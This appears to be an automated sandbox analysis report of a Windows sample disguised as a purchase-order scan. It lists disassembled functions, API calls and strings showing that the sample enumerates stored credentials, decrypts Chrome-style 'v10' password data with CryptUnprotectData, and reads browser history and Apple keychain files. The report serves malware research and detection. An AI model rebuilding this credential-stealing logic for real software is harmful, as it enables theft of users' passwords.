                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                • String ID: AE$BIN
                                                                                • API String ID: 1668488027-3931574542
                                                                                • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                APIs
                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                • free.MSVCRT ref: 00418803
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                • String ID:
                                                                                • API String ID: 1355100292-0
                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 767404330-0
                                                                                • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNext
                                                                                • String ID:
                                                                                • API String ID: 1690352074-0
                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041898C
                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004455C2
                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 0044570D
                                                                                • memset.MSVCRT ref: 00445725
                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                • memset.MSVCRT ref: 0044573D
                                                                                • memset.MSVCRT ref: 00445755
                                                                                • memset.MSVCRT ref: 004458CB
                                                                                • memset.MSVCRT ref: 004458E3
                                                                                • memset.MSVCRT ref: 0044596E
                                                                                • memset.MSVCRT ref: 00445A10
                                                                                • memset.MSVCRT ref: 00445A28
                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                • memset.MSVCRT ref: 00445B52
                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                • memset.MSVCRT ref: 00445B82
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                • memset.MSVCRT ref: 00445986
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                • API String ID: 1963886904-3798722523
                                                                                • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                • API String ID: 2744995895-28296030
                                                                                • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                • memset.MSVCRT ref: 0040B756
                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                • memset.MSVCRT ref: 0040B851
                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                • String ID: chp$v10
                                                                                • API String ID: 1297422669-2783969131
                                                                                • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • free.MSVCRT ref: 0040E49A
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                • memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                • API String ID: 3849927982-2252543386
                                                                                • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004091E2
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
